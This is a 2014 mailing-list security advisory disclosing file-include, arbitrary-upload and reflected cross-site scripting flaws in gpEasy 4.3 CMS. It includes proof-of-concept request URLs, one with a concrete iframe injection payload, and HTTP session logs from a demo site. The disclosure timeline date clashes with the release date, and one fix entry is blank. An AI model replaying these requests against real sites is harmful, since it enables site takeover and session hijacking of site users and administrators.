[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
gpEasy v4.3.x CMS - Multiple Web Vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx
- Subject: gpEasy v4.3.x CMS - Multiple Web Vulnerabilities
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Fri, 07 Feb 2014 12:31:17 +0100
Document Title:
===============
gpEasy v4.3.x CMS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1189
Release Date:
=============
2014-02-06
Vulnerability Laboratory ID (VL-ID):
====================================
1189
Common Vulnerability Scoring System:
====================================
6.1
Product & Service Introduction:
===============================
gpEasy 4.3 is a complete content management system that lets users create rich
and flexible Web sites with a simple and easy-to-use interface.
The embedded design of the admin interface allows users to instantly see
changes in a single browser window. gpEasy has many qualities,
but if we had to pick three adjectives to describe our CMS, it would have to be
fast, easy and free. These three small words represent
big ideas for us and embody the principles that drive gpEasy development.
(Copy of the Vendor Homepage: http://www.gpeasy.com/Fast_Easy_and_Free )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web
vulnerabilities in the official gpEasy v4.3 content management system.
Vulnerability Disclosure Timeline:
==================================
2013-02-06: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
gpEasy
Product: gpEasy Content Management System (Web Application) 4.3
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A file include and arbitrary file upload web vulnerability has been discovered
in the official gpEasy v4.3 content management system.
The local file include web vulnerability allows remote attackers to
unauthorized include local file/path requests or system specific
path commands to compromise the web-application. The arbitrary file upload
issue allows remote attackers to upload files with multiple
extensions to bypass the web-server or system validation.
The vulnerability is located in the `file- and folder` name values of the
`upload files` module. Attackers can tamper the POST method
request to upload own malicious script codes or web shells. The validation does
also not support filter mechanism for multiple file extension
which can result in a prepared combined attack to include a file and
upload/execute arbitrary codes. The security risk
of the local and remote vulnerability is estimated as high with a cvss (common
vulnerability scoring system) count of 6.1(-).
Exploitation of the local file include and arbitrary file upload web
vulnerability requires no user interaction but a privileged web-application
user account. Successful exploitation of the local web vulnerability results in
application or dbms compromise by combined lfi/afu web attacks.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Home > Administration > Uploaded Files
Vulnerable Parameter(s):
[+] file- and folder name
Vulnerable Module(s):
[+] Upload File Manager
1.2
Multiple client-side cross site scripting web vulnerabilities has been
discovered in the official gpEasy v4.3 content management system.
A non-persistent cross site vulnerability allows remote attackers to manipulate
client-side browser requests through the affected web-application.
The vulnerability is located in the `mount network volume` function of the
`content > upload files` module. The vulnerable input field values are
`host`,`port`,`path`,`user` and `pass`. Remote attackers can manipulate the GET
method request of the `mount network volume` function to provoke a wrong
encoded exception which executes the injected script code. The code executes in
the invalid error message exception of the mount network volume function.
The security risk of the remote xss web vulnerability is estimated as medium
with a cvss (common vulnerability scoring system) count of 2.9(+).
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Home > Administration > Uploaded Files >
Mount Network Volume
Vulnerable Parameter(s):
[+] host
[+] port
[+] path
[+] user
[+] pass
Affected Module(s):
[+] Error invalid Content Exception
Proof of Concept (PoC):
=======================
1.1
The file include and arbitrary file upload web vulnerability can be exploited
by local attacker with privileged user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided steps and information below.
PoC:
<div style="height: 746px;" class="finder-cwd-wrapper"><div style="height:
744px;" unselectable="on"
class="ui-helper-clearfix finder-cwd ui-selectable ui-droppable
finder-cwd-view-icons"><div id="tmp_57646"
class="finder-cwd-file directory ui-corner-all finder-cwd-file-tmp ui-selectee
ui-state-disabled" title="Today 17:0">
<div class="finder-cwd-file-wrapper ui-corner-all"><div class="finder-cwd-icon
finder-cwd-icon-directory ui-corner-all"
unselectable="on"></div></div><div class="finder-cwd-filename" title="untitled
folder">>"<[FILE INCLUDE VULNERABILITY VIA PATH]</div></div>
--- PoC Session Logs [POST] ---
Status: 200[OK]
GET
http://gpeasy.localhost:8622/Admin_Finder?verified=a78309cc12&cmd=mkdir&name=[FILE
INCLUE VULNERABILITY!+]&target=[#PENG!]l1_Lw&_=1391616013488 Load
Flags[LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[demo-31ca1a14f3ab75.gpeasy.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://demo-31ca1a14f3ab75.gpeasy.com/Admin_Uploaded]
Cookie[demo-31ca1a14f3ab75=eab8166b0a152ac27b9c0136a5e45478d1c5dff8a499c6265ec407d655526762b9845a1a;
gpEasy_53ef13dc235a=4CPb4xGrLOKfN2YR0O8HdxJqnzVUqNrck5PwFKfQ]
Connection[keep-alive]
Response Header:
Date[Wed, 05 Feb 2014 16:00:26 GMT]
Server[Apache/2.2.24 (Unix)]
X-Powered-By[PHP/5.3.3]
Expires[Wed, 5 Feb 2014 16:00:26 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0,
pre-check=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
Content-Encoding[gzip]
Vary[Accept-Encoding]
Last-Modified[Wed, 05 Feb 2014 16:00:26 GMT]
Connection[close]
Transfer-Encoding[chunked]
Content-Type[text/html; charset=utf-8]
1.2
The cross site scripting web vulnerability can be exploited by remote attackers
without privileged user account and with medium or high user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided steps and information below.
Example PoC:
http://gpeasy.localhost:8622/Admin_Finder?verified=a78309cc12&cmd=netmount&protocol=ftp&host=%22[CLIENT-SIDE
INJECTED SCRIPT CODE!]%3E&port=%22[CLIENT-SIDE INJECTED SCRIPT CODE!]%3E
&path=%22[CLIENT-SIDE INJECTED SCRIPT CODE!]%3E&user=%22[CLIENT-SIDE INJECTED
SCRIPT CODE!]%3E&pass=%22[CLIENT-SIDE INJECTED SCRIPT CODE!]%3E&_=1391619422697
PoC:
http://gpeasy.localhost:8622/Admin_Finder?verified=a78309cc12&cmd=netmount&protocol=ftp&host=%22%3E%3Ciframe+src%3Da%3E&port=%22%3E%3Ciframe+src%3Da%3E
&path=%2F%22%3E%3Ciframe+src%3Da%3E&user=%22%3E%3Ciframe+src%3Da%3E&pass=%22%3E%3Ciframe+src%3Da%3E&_=1391619422697
PoC: Source Admin_Finder? - Exception
<html><head></head><body>{"error":["errNetMount","\"><%22[CLIENT-SIDE INJECTED
SCRIPT CODE!]%3E">",
"Unable to connect to FTP server \"><%22[CLIENT-SIDE INJECTED SCRIPT
CODE!]%3E>"],"debug":{"connector":"php","phpver":"5.3.3","time":0.25530505180359,
"memory":"7415Kb \/ 7365Kb \/
128M","upload":"","volumes":[{"id":"l1_","name":"localfilesystem","imgLib":"gd"}],"mountErrors":[]}}</iframe></body></html>
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET
http://gpeasy.localhost:8622/Admin_Finder?verified=a78309cc12&cmd=netmount&protocol=ftp&host=%22%3E%3Ciframe+src%3Da%3E&port=%22%3E%3Ciframe+src%3Da%3E&path=%2F%22%3E%3Ciframe+src%3Da%3E&user=%22%3E%3Ciframe+src%3Da%3E&pass=%22%3E%3Ciframe+src%3Da%3E&_=1391619422697
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[demo-31ca1a14f3ab75.gpeasy.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://demo-31ca1a14f3ab75.gpeasy.com/Admin_Uploaded]
Cookie[demo-31ca1a14f3ab75=eab8166b0a152ac27b9c0136a5e45478d1c5dff8a499c6265ec407d655526762b9845a1a;
gpEasy_53ef13dc235a=4CPb4xGrLOKfN2YR0O8HdxJqnzVUqNrck5PwFKfQ]
Connection[keep-alive]
Response Header:
Date[Wed, 05 Feb 2014 16:57:15 GMT]
Server[Apache/2.2.24 (Unix)]
X-Powered-By[PHP/5.3.3]
Expires[Wed, 5 Feb 2014 16:57:15 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0,
pre-check=0]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
Content-Encoding[gzip]
Vary[Accept-Encoding]
Last-Modified[Wed, 05 Feb 2014 16:57:15 GMT]
Connection[close]
Transfer-Encoding[chunked]
Content-Type[text/html; charset=utf-8]
Solution - Fix & Patch:
=======================
1.1.
1.2
The second vulnerability can be patched by a secure parse of the invalid
context exception handling.
Parse and filter the input field GET method request with the vulnerable host,
path, pass, user and port parameters.
Security Risk:
==============
1.1
The security risk of the local file include and arbitrary file upload web
vulnerability is estimated as high(-).
1.2
The secuirty risk of the client-side cross site scripting web vulnerabilities
are estimated as medium(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(bkm@xxxxxxxxxxxxxxxxx) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential
or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor
licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.evolution-sec.com
Contact: admin@xxxxxxxxxxxxxxxxxxxxx -
research@xxxxxxxxxxxxxxxxxxxxx - admin@xxxxxxxxxxxxxxxxx
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com
- magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab
- youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file
requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All
pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@xxxxxxxxxxxxxxxxxxxxx or
research@xxxxxxxxxxxxxxxxxxxxx) to get a permission.
Copyright © 2014 | Vulnerability Laboratory
[Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx